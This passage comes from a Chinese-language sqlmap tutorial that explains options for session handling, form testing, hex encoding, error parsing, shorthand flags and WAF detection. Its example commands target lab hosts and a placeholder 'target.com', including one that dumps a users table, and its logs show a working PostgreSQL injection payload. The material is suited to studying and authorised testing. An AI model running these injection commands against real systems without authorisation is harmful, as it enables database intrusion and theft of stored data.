class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Oracle<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.2.0.1.0&nbsp;&#8211;&nbsp;Prod&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5148\u8f93\u51fa\u957f\u5ea6\uff0c\u9884\u8ba1\u5b8c\u6210\u65f6\u95f4\uff0c\u663e\u793a\u767e\u5206\u6bd4\uff0c\u8f93\u51fa\u5b57\u7b26<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%B7%E6%96%B0session%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5237\u65b0session\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;flush-session<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684<span>session<\/span><span>\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002&nbsp;\u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684<\/span><span>session<\/span><span>\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%87%AA%E5%8A%A8%E8%8E%B7%E5%8F%96form%E8%A1%A8%E5%8D%95%E6%B5%8B%E8%AF%95\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;forms<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u5bf9\u4e00\u4e2a\u9875\u9762\u7684<span>form<\/span><span>\u8868\u5355\u4e2d\u7684\u53c2\u6570\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>-r<\/span><span>\u53c2\u6570\u8bfb\u53d6\u8bf7\u6c42\u6587\u4ef6\uff0c\u6216\u8005\u901a\u8fc7<\/span><span>&#8211;data<\/span><span>\u53c2\u6570\u6d4b\u8bd5\u3002&nbsp;\u4f46\u662f\u5f53\u4f7f\u7528<\/span><span>&#8211;forms<\/span><span>\u53c2\u6570\u65f6\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u4ece<\/span><span>-u<\/span><span>\u4e2d\u7684<\/span><span>url<\/span><span>\u83b7\u53d6\u9875\u9762\u4e2d\u7684\u8868\u5355\u8fdb\u884c\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BF%BD%E7%95%A5%E5%9C%A8%E4%BC%9A%E8%AF%9D%E6%96%87%E4%BB%B6%E4%B8%AD%E5%AD%98%E5%82%A8%E7%9A%84%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;fresh-queries<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5ffd\u7565<span>session<\/span><span>\u6587\u4ef6\u4fdd\u5b58\u7684\u67e5\u8be2\uff0c\u91cd\u65b0\u67e5\u8be2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8DBMS%E7%9A%84hex%E5%87%BD%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528DBMS\u7684hex\u51fd\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;hex<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u5019\u5b57\u7b26\u7f16\u7801\u7684\u95ee\u9898\uff0c\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u4e22\u5931\uff0c\u53ef\u4ee5\u4f7f\u7528<span>hex<\/span><span>\u51fd\u6570\u6765\u907f\u514d\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9488\u5bf9<span>PostgreSQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.48.130\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;&#8211;banner&nbsp;&#8211;hex&nbsp;-v&nbsp;3&nbsp;&#8211;parse-errors<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[PAYLOAD]&nbsp;1&nbsp;AND&nbsp;5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION()&nbsp;AS&nbsp;CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58))&nbsp;AS&nbsp;NUMERIC)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:15]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;pg_query()&nbsp;[&lt;a&nbsp;href=&#8217;function.pg-query&#8217;&gt;function.pg-query&lt;\/a&gt;]:&nbsp;Query&nbsp;failed:&nbsp;ERROR:&nbsp;&nbsp;invalid&nbsp;input&nbsp;syntax&nbsp;for&nbsp;type&nbsp;numeric:&nbsp;&#8220;:vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:&#8221;&nbsp;in&nbsp;&lt;b&gt;\/var\/www\/sqlmap\/libs\/pgsql.inc.php&lt;\/b&gt;&nbsp;on&nbsp;line&nbsp;&lt;b&gt;35&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:15]&nbsp;[INFO]&nbsp;retrieved:&nbsp;PostgreSQL&nbsp;8.3.9&nbsp;on&nbsp;i486-pc-linux-gnu,&nbsp;compiled&nbsp;by<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">GCC&nbsp;gcc-4.3.real&nbsp;(Debian&nbsp;4.3.2-1.1)&nbsp;4.3.2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%87%AA%E5%AE%9A%E4%B9%89%E8%BE%93%E5%87%BA%E7%9A%84%E8%B7%AF%E5%BE%84\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;output-dir<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u628a<\/span><span>session<\/span><span>\u6587\u4ef6\u8ddf\u7ed3\u679c\u6587\u4ef6\u4fdd\u5b58\u5728<\/span><span>output<\/span><span>\u6587\u4ef6\u5939\u4e0b\uff0c\u7528\u6b64\u53c2\u6570\u53ef\u81ea\u5b9a\u4e49\u8f93\u51fa\u8def\u5f84&nbsp;\u4f8b\u5982\uff1a<\/span><span>&#8211;output-dir=\/tmp<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E5%93%8D%E5%BA%94%E4%B8%AD%E8%8E%B7%E5%8F%96DBMS%E7%9A%84%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;parse-errors<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u76ee\u6807\u6ca1\u6709\u5173\u95ed<span>DBMS<\/span><span>\u7684\u62a5\u9519\uff0c\u5f53\u6570\u636e\u5e93\u8bed\u53e5\u9519\u8bef\u65f6\uff0c\u4f1a\u8f93\u51fa\u9519\u8bef\u8bed\u53e5\uff0c\u7528\u8bcd\u53c2\u6570\u53ef\u4ee5\u4f1a\u663e\u51fa\u9519\u8bef\u4fe1\u606f\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1&#8221;&nbsp;&#8211;parse-errors<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;ORDER&nbsp;BY&nbsp;technique&nbsp;seems&nbsp;to&nbsp;be&nbsp;usable.&nbsp;This&nbsp;should&nbsp;reduce&nbsp;the&nbsp;time&nbsp;needed&nbsp;to&nbsp;find&nbsp;the&nbsp;right&nbsp;number&nbsp;of&nbsp;query&nbsp;columns.&nbsp;Automatically&nbsp;extending&nbsp;the&nbsp;range&nbsp;for&nbsp;current&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;test<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;10&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;6&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;4&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;target&nbsp;URL&nbsp;appears&nbsp;to&nbsp;have&nbsp;3&nbsp;columns&nbsp;in&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%85%B6%E4%BB%96%E7%9A%84%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8%E5%8F%82%E6%95%B0%E7%BC%A9%E5%86%99\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528\u53c2\u6570\u7f29\u5199<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-z<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u4f7f\u7528\u53c2\u6570\u592a\u957f\u592a\u590d\u6742\uff0c\u53ef\u4ee5\u4f7f\u7528\u7f29\u5199\u6a21\u5f0f\u3002&nbsp;\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;&#8211;batch&nbsp;&#8211;random-agent&nbsp;&#8211;ignore-proxy&nbsp;&#8211;technique=BEU&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u5199\u6210\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-z&nbsp;&#8220;bat,randoma,ign,tec=BEU&#8221;&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd8\u6709\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;&#8211;ignore-proxy&nbsp;&#8211;flush-session&nbsp;&#8211;technique=U&nbsp;&#8211;dump&nbsp;-D&nbsp;testdb&nbsp;-T&nbsp;users&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u5199\u6210\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-z&nbsp;&#8220;ign,flu,bat,tec=U,dump,D=testdb,T=users&#8221;&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%88%90%E5%8A%9FSQL%E6%B3%A8%E5%85%A5%E6%97%B6%E8%AD%A6%E5%91%8A\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp;<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;alert<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E4%BC%9A%E5%8F%91%E7%9A%84%E7%AD%94%E6%A1%88\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;answers<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u5e0c\u671b<span>sqlmap<\/span><span>\u63d0\u51fa\u8f93\u5165\u65f6\uff0c\u81ea\u52a8\u8f93\u5165\u81ea\u5df1\u60f3\u8981\u7684\u7b54\u6848\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff1a&nbsp;\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.22.128\/sqlmap\/mysql\/get_int.php?id=1&#8243;&#8211;technique=E&nbsp;&#8211;answers=&#8221;extending=N&#8221;&nbsp;&#8211;batch<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:56]&nbsp;[INFO]&nbsp;testing&nbsp;for&nbsp;SQL&nbsp;injection&nbsp;on&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;MySQL&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:56]&nbsp;[INFO]&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;MySQL&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;N<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%91%E7%8E%B0SQL%E6%B3%A8%E5%85%A5%E6%97%B6%E5%8F%91%E5%87%BA%E8%9C%82%E9%B8%A3%E5%A3%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;beep<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53d1\u73b0<span>sql<\/span><span>\u6ce8\u5165\u65f6\uff0c\u53d1\u51fa\u8702\u9e23\u58f0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%90%AF%E5%8F%91%E5%BC%8F%E6%A3%80%E6%B5%8BWAFIPSIDS%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;check-waf<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 